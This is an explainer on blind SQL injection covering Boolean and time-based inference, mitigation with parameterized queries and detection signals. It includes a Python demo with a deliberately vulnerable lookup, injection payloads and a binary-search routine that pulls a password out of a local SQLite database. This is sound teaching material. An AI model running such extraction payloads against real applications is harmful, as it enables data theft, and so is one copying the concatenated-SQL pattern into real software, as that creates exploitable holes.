ELI5: What is Blind SQL Injection?
It’s like playing 20 questions with a locked diary — you can’t read it directly, but by asking yes-or-no questions, you can slowly figure out what’s written inside.
Definition
Blind SQL injection is a form of SQL injection in which the application returns neither database error messages nor query results to the attacker. Instead, the attacker injects a condition and infers information from how the application behaves when that condition is true versus false: a visible difference in the response (Boolean-based blind SQLi) or a measurable delay triggered by a conditional SQL statement (Time-based blind SQLi). Each request leaks only one bit, so data is reconstructed one bit or one character at a time.
Key Details
- Boolean-based blind SQLi: Attacker sends queries that change the page response (e.g., returns different content or length) based on true/false conditions.
- Time-based blind SQLi: Wraps a database delay function such as SLEEP() (MySQL) or WAITFOR DELAY (SQL Server) in a condition (IF/CASE) so the query only stalls when the condition is true; the attacker infers data bit by bit from response timing, even when the page content never changes.
- Much slower than error-based or UNION-based SQLi (roughly one request per bit, or about seven per character with binary search over the character code), but equally dangerous: automated tools such as sqlmap extract entire databases this way.
- Mitigation: parameterized queries (prepared statements) are the primary control; stored procedures help only if they do not build dynamic SQL internally; allow-list input validation and a WAF are defense in depth, not substitutes.
- The blind nature means no data appears in responses, so the attack is easy to miss in application logs; but the request parameters still carry SQL-like fragments (AND 1=1, SLEEP(, WAITFOR DELAY), and the long run of near-identical requests differing in one value is itself a detection signal.
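The following is an added worked example, not code from the original page, tying together the definition above (Boolean-based and time-based inference) and the mitigation bullet. It builds a constructed in-memory SQLite database with a vulnerable lookup that concatenates the username into SQL, recovers a password from that lookup using only yes/no answers, and shows the same payload failing against the parameterized version. SQLite has no SLEEP(), so the time-based oracle registers a user-defined sleep() function as a stand-in for MySQL SLEEP() or SQL Server WAITFOR DELAY; the table, users, values and helper names are all assumptions of this demo.

```python
import sqlite3
import time


def build_db():
    """Constructed in-memory stand-in for the application's database (demo data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "s3cret!"), (2, "guest", "guest")])
    conn.commit()
    return conn


def vulnerable_user_exists(conn, username):
    """VULNERABLE: user input is concatenated into the SQL text. The caller only
    learns whether a row came back ('Welcome back' vs 'Unknown user'), which is
    the single bit a Boolean-based blind attack needs."""
    sql = f"SELECT id FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchone() is not None


def safe_user_exists(conn, username):
    """Hardened version: the value is bound as a parameter, so the database
    treats it as data and never parses it as SQL."""
    sql = "SELECT id FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchone() is not None


def boolean_asker(conn, known_user):
    """Boolean-based oracle: 'is <cond> true?' answered by the page content."""
    return lambda cond: vulnerable_user_exists(conn, f"{known_user}' AND {cond} -- ")


def time_asker(conn, known_user, delay=0.05):
    """Time-based oracle. A user-defined sleep() (assumed for this demo) stands in
    for MySQL SLEEP() / SQL Server WAITFOR DELAY. The response is identical
    either way; only the elapsed time leaks the answer."""
    conn.create_function("sleep", 1, lambda s: time.sleep(s) or 0)

    def ask(cond):
        payload = f"{known_user}' AND CASE WHEN {cond} THEN sleep({delay}) ELSE 0 END -- "
        t0 = time.perf_counter()
        vulnerable_user_exists(conn, payload)  # return value is always False here
        return time.perf_counter() - t0 >= delay / 2
    return ask


def binary_search_int(greater_than, lo, hi):
    """Locate an integer v in [lo, hi] from an oracle that answers 'v > mid?'."""
    while lo < hi:
        mid = (lo + hi) // 2
        if greater_than(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def blind_extract(ask, column, max_len=64):
    """Recover users.<column> for the oracle's row from yes/no answers only:
    first the length, then each character by binary search on its code point
    (about 7 requests per character instead of 128 linear guesses)."""
    length = binary_search_int(lambda mid: ask(f"length({column}) > {mid}"), 0, max_len)
    chars = []
    for pos in range(1, length + 1):
        code = binary_search_int(
            lambda mid, pos=pos: ask(f"unicode(substr({column},{pos},1)) > {mid}"), 0, 0x7F)
        chars.append(chr(code))
    return "".join(chars)


if __name__ == "__main__":
    conn = build_db()
    sent = []
    ask = boolean_asker(conn, "admin")

    def counted(cond):
        sent.append(cond)
        return ask(cond)

    print("boolean-based:", blind_extract(counted, "password"), f"({len(sent)} requests)")
    print("time-based:   ", blind_extract(time_asker(conn, "admin"), "password"))
    # Against the parameterized lookup the payload is just a username that does not exist.
    print("parameterized:", safe_user_exists(conn, "admin' AND 1=1 -- "))
```

The request log produced by this loop is the detection signal mentioned above: dozens of requests for the same username that differ only in a position index and a threshold number. Swapping the oracle from boolean_asker to time_asker changes nothing in the extraction logic, which is why the time-based variant is the fallback whenever the page content does not differ.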
Connections
- Parent: injection-attacks — a variant of SQL injection
- See also: sql-injection-sqli, parameterized-queries-prepared-statements